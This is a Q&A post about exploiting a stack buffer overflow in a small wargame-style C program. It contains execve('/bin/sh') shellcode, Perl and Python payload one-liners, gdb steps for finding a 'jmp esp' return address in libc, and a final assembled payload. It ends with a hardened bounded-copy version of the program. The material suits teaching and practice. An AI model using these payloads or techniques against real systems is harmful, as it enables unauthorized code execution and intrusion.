Question

I am trying a buffer overflow on the following program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[]){
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter: wipe the environment so nothing can be stashed there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* unchecked copy into a 40-byte buffer: the overflow */
    printf("%s\n", buffer);
    return 0;
}

I used this payload to try overflowing the buffer:

    ./orc `perl -e 'print"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'``perl -e 'print "\x90"x9, "\xac\xfa\xff\xbf"'`

However, it does not seem to work and only gives me this result:

    j
     X?Rh//shh/bin??S?訴???????????

Yes, it's almost my first time trying a BOF, and I feel like the return address at the end of the payload (the last four bytes, "\xac\xfa\xff\xbf") is inaccurate. So, how do you get the return address to put at the end of the shellcode? And what does it do? Thanks in advance :)


Solution

I couldn't tell you if your return code is correct or not as I don't know where you're planning on returning.

Compiling this code with "-fno-stack-protector -z execstack" and with ASLR disabled (echo 0 > /proc/sys/kernel/randomize_va_space), my buffer looks like the following:

    # ./orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')

Running it in gdb (gdb --args orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')) and dumping esp (x/100x $esp) shows that it points to the area of the buffer directly after the return address, so if you could find a RET %ESP instruction somewhere in memory, having your return address point to it would drop you directly back to your buffer.

To find a suitable return address, you can do the following (again assuming that ASLR has been disabled):

  1. Find the address of the linked libraries - on my box this shows:

    # ldd orc
    linux-gate.so.1 =>  (0xb7fff000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e80000)
    /lib/ld-linux.so.2 (0x80000000)
    
  2. Search the address provided for libc (0xb7e80000) for the RET %ESP instruction from within gdb using "find /b [start-search-address], [end-search-address], [stuff-to-search-for]".

    # gdb --args orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')
    gdb$ b main
    Breakpoint 1 at 0x8048555: file orc.c, line 12
    gdb$ r
    Breakpoint 1, main (argc=0x2, argv=0xbffff4e4) at orc.c:12
    12      if (argc < 2)
    gdb$ find /b 0xb7e80000, 0xb7fff000, 0xff, 0xe4
    0xb7f88a0f
    0xb7f96b73
    0xb7f96bf3
    ...
    0xb7f96df3
    0xb7f975f3
    0xb7f97673
    
  3. Pick one for the return address - I selected the first one '0xb7f88a0f' which is plumbed into the buffer as '\x0f\x8a\xf8\xb7'.

This should drop you on your buffer, which you can verify once again by placing a bunch of breakpoints ('\xCC') after the return address and running the program in gdb as shown above. Execution should break on the address immediately following your return address. Verify with:

    gdb$ x/8x $eip-4
    0xbffff43c: 0xb7f88a0f  0xcccccccc  0xcccccccc  0xcccccccc
    0xbffff44c: 0xcccccccc  0xcccccccc  0xcccccccc  0xcccccccc

You should see your return address at EIP - 4 bytes, and the final buffer should look like this (no need for the nops):

    $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
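For contrast, here is a hardened counterpart of the program in the question. It is an added example, not code from either poster: the unchecked strcpy() into the 40-byte buffer is replaced by a bounded copy (copy_bounded, a name chosen here) that refuses input which would not fit, so an over-long argv[1] can no longer reach the saved frame pointer or return address. The egghunter loop and the argv[1][47] gate are left out because they only serve the exercise.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 40

/* Copy src into dst (capacity dstsz) only if it fits together with its
 * terminating NUL. Returns the number of bytes copied, or -1 if src is
 * too long. The length scan never reads more than dstsz bytes of src. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n >= dstsz)            /* no room left for the terminator */
        return -1;
    memcpy(dst, src, n + 1);   /* n bytes of payload plus the NUL */
    return (int)n;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    /* In the original, anything longer than 39 bytes spilled past buffer
     * into the saved registers; here it is rejected before any write. */
    if (copy_bounded(buffer, sizeof buffer, argv[1]) < 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

Keeping the compiler's defaults (stack protector on, non-executable stack, ASLR enabled) adds further layers, but the bounds check is what removes the bug itself.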
License: CC-BY-SA with attribution